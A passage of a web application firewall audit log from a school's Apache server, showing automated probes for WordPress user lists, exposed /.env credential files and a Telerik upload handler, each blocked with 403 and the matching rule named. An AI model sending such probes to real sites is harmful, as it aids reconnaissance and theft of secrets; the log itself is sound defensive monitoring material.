X-Real-IP: 196.216.10.129 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.216.10.129 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5957d563-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5957d563-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748191524572450 2780 (- - -) Stopwatch2: 1748191524572450 2780; combined=1234, p1=418, p2=788, p3=0, p4=0, p5=28, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5957d563-Z-- --4677df4b-A-- [26/May/2025:00:46:36 +0700] aDNXfBEdxfhJOSxH8A9A5AAAAFM 103.236.140.4 59690 103.236.140.4 8181 --4677df4b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 91.191.38.107 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 91.191.38.107 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4677df4b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4677df4b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748195196995750 2827 (- - -) Stopwatch2: 1748195196995750 2827; combined=1245, p1=440, p2=775, p3=0, p4=0, p5=29, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4677df4b-Z-- --80283265-A-- [26/May/2025:01:27:40 +0700] aDNhHHawJq5017Xs8D40ZwAAAMg 103.236.140.4 33096 103.236.140.4 8181 --80283265-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 2.179.194.216 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 2.179.194.216 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --80283265-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80283265-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748197660627852 2398 (- - -) Stopwatch2: 1748197660627852 2398; combined=1123, p1=384, p2=710, p3=0, p4=0, p5=29, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80283265-Z-- --993e5236-A-- [26/May/2025:01:28:39 +0700] aDNhV3awJq5017Xs8D40agAAAMo 103.236.140.4 33104 103.236.140.4 8181 --993e5236-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.169.98.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.169.98.246 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --993e5236-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --993e5236-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748197719631440 2786 (- - -) Stopwatch2: 1748197719631440 2786; combined=1221, p1=414, p2=778, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --993e5236-Z-- --3d6d011d-A-- [26/May/2025:02:49:38 +0700] aDN0UterygsLmB9N_YSxrQAAAJQ 103.236.140.4 33466 103.236.140.4 8181 --3d6d011d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 Accept-Charset: utf-8 --3d6d011d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d6d011d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748202578501763 809 (- - -) Stopwatch2: 1748202578501763 809; combined=311, p1=273, p2=0, p3=0, p4=0, p5=38, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d6d011d-Z-- --df237762-A-- [26/May/2025:03:04:12 +0700] aDN3vNerygsLmB9N_YSz1QAAAJQ 103.236.140.4 42892 103.236.140.4 8181 --df237762-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 162.243.233.172 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 162.243.233.172 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --df237762-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --df237762-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748203452506380 684 (- - -) Stopwatch2: 1748203452506380 684; combined=283, p1=253, p2=0, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df237762-Z-- --097dc80c-A-- [26/May/2025:03:22:01 +0700] aDN76derygsLmB9N_YS1HgAAAIM 103.236.140.4 49862 103.236.140.4 8181 --097dc80c-B-- GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.156.129.54 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.156.129.54 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Accept: */* --097dc80c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --097dc80c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748204521461951 2422 (- - -) Stopwatch2: 1748204521461951 2422; combined=1133, p1=403, p2=702, p3=0, p4=0, p5=28, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --097dc80c-Z-- --6e8ce41a-A-- [26/May/2025:04:08:08 +0700] aDOGuFSmKJQK-9oQ9SRPdgAAAIM 103.236.140.4 50890 103.236.140.4 8181 --6e8ce41a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.89.71.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.89.71.218 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6e8ce41a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e8ce41a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748207288685484 3414 (- - -) Stopwatch2: 1748207288685484 3414; combined=1525, p1=475, p2=1016, p3=0, p4=0, p5=34, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e8ce41a-Z-- --39001d14-A-- [26/May/2025:04:33:37 +0700] aDOMsVSmKJQK-9oQ9SRPqAAAAJA 103.236.140.4 51088 103.236.140.4 8181 --39001d14-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.96 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 Accept-Charset: utf-8 --39001d14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --39001d14-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748208817178866 883 (- - -) Stopwatch2: 1748208817178866 883; combined=392, p1=352, p2=0, p3=0, p4=0, p5=40, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39001d14-Z-- --4d4c851b-A-- [26/May/2025:04:51:06 +0700] aDOQynFOzWd_Ai7zJXXXwwAAABA 103.236.140.4 51170 103.236.140.4 8181 --4d4c851b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.96 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; Lenovo A6010) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36 Accept-Charset: utf-8 --4d4c851b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d4c851b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748209866292573 937 (- - -) Stopwatch2: 1748209866292573 937; combined=364, p1=323, p2=0, p3=0, p4=0, p5=41, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d4c851b-Z-- --c7946e1e-A-- [26/May/2025:04:59:24 +0700] aDOSvFSmKJQK-9oQ9SRP6gAAAIg 103.236.140.4 51306 103.236.140.4 8181 --c7946e1e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.124.43.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.124.43.20 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c7946e1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7946e1e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748210364096055 2177 (- - -) Stopwatch2: 1748210364096055 2177; combined=1082, p1=362, p2=692, p3=0, p4=0, p5=27, sr=87, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7946e1e-Z-- --8af54f65-A-- [26/May/2025:05:05:04 +0700] aDOUEHFOzWd_Ai7zJXXXxAAAABE 103.236.140.4 51326 103.236.140.4 8181 --8af54f65-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; moto g(6)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --8af54f65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8af54f65-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748210704139743 797 (- - -) Stopwatch2: 1748210704139743 797; combined=348, p1=298, p2=0, p3=0, p4=0, p5=50, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8af54f65-Z-- --42d32b68-A-- [26/May/2025:05:58:11 +0700] aDOgg1SmKJQK-9oQ9SRSGgAAAI4 103.236.140.4 52730 103.236.140.4 8181 --42d32b68-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 217.150.216.132 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 217.150.216.132 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --42d32b68-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --42d32b68-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748213891280985 2820 (- - -) Stopwatch2: 1748213891280985 2820; combined=1264, p1=447, p2=787, p3=0, p4=0, p5=30, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --42d32b68-Z-- --8a906563-A-- [26/May/2025:07:09:14 +0700] aDOxKlSmKJQK-9oQ9SRShAAAAII 103.236.140.4 53160 103.236.140.4 8181 --8a906563-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; Nexus 7 Build/KTU84P) AppleWebKit/537.36 (KHTML like Gecko) Chrome/36.0.1985.135 Safari/537.36 Accept-Charset: utf-8 --8a906563-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a906563-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748218154447345 866 (- - -) Stopwatch2: 1748218154447345 866; combined=374, p1=334, p2=0, p3=0, p4=0, p5=40, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a906563-Z-- --294cff02-A-- [26/May/2025:07:09:15 +0700] aDOxK1SmKJQK-9oQ9SRShQAAAIc 103.236.140.4 53162 103.236.140.4 8181 --294cff02-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; LG-H932) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --294cff02-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --294cff02-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748218155710022 934 (- - -) Stopwatch2: 1748218155710022 934; combined=420, p1=379, p2=0, p3=0, p4=0, p5=41, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --294cff02-Z-- --0294557b-A-- [26/May/2025:07:37:48 +0700] aDO33FSmKJQK-9oQ9SRSnwAAAIc 103.236.140.4 53250 103.236.140.4 8181 --0294557b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 189.89.186.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 189.89.186.58 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0294557b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0294557b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748219868110542 3517 (- - -) Stopwatch2: 1748219868110542 3517; combined=1488, p1=505, p2=950, p3=0, p4=0, p5=33, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0294557b-Z-- --fb5f1f2f-A-- [26/May/2025:08:03:26 +0700] aDO93lSmKJQK-9oQ9SRStQAAAJU 103.236.140.4 53392 103.236.140.4 8181 --fb5f1f2f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 95.170.203.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 95.170.203.178 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --fb5f1f2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb5f1f2f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748221406294842 3550 (- - -) Stopwatch2: 1748221406294842 3550; combined=1521, p1=536, p2=953, p3=0, p4=0, p5=32, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb5f1f2f-Z-- --1de27c62-A-- [26/May/2025:09:17:51 +0700] aDPPT3FOzWd_Ai7zJXXZxAAAAAE 103.236.140.4 57212 103.236.140.4 8181 --1de27c62-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 --1de27c62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1de27c62-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748225871310655 750 (- - -) Stopwatch2: 1748225871310655 750; combined=311, p1=274, p2=0, p3=0, p4=0, p5=37, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1de27c62-Z-- --cd5c2067-A-- [26/May/2025:09:29:51 +0700] aDPSH1SmKJQK-9oQ9SRVNAAAAI0 103.236.140.4 57342 103.236.140.4 8181 --cd5c2067-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 85.195.247.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: 